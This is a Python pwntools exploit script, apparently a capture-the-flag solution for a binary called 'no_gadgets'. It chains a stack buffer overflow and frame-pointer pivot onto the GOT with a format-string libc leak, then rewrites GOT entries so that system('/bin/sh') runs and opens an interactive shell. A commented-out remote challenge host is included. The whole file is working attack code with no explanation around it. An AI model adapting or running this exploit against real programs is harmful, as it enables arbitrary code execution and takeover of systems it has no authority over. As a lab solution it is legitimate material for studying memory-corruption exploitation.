from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack

p = None


def run():
    global p
    chall = './no_gadgets'
    context.binary = chall
#    context.log_level = 'debug'
    p = process(chall)
#    p = remote("94.237.56.30", "41910")
    elf = ELF(chall)
    rop = ROP(elf)
    libc = ELF('./libc.so.6')

    pause()

    RBP = p64(0x00401216 + 0x80)
    payload = b''
    payload += b'\x00'*0x80
    payload += p64(elf.got['puts'] + 0x80) + p64(0x401275) + p64(0x40121b)

    p.sendlineafter(b"Data: ", payload)

    # We use got.puts to hold our payload
    payload = b'%p%p%p%p' # got.puts
    # Then we repopulate all got entries by plt resolver
    payload += p64(0x0000000000401211) # got.strlen -> call printf
    payload += p64(elf.plt['printf'] + 0x6) # got.printf
    payload += p64(elf.plt['fgets'] + 0x6) # got.fgets
    payload += p64(elf.plt['setvbuf'] + 0x6) # got.setvbuf
    payload += p64(elf.plt['exit'] + 0x6) # got.exit

    assert b'\x0a' not in payload, 'Wrong char in payload'

    p.sendline(payload)

    p.recvuntil(b'scratch!\n')
    leak = int(p.recv(64)[2:14], 16)
    libc_base = leak - 0x219b23
    libc.address = libc_base

    print(f'LIBC_BASE = {hex(libc_base)}')

    payload = b'/bin/sh\x00' # got.puts
    payload += p64(libc.symbols['system']) # got.printf and also strlen

    p.sendline(payload)

    p.interactive()

if __name__ == "__main__":
    run()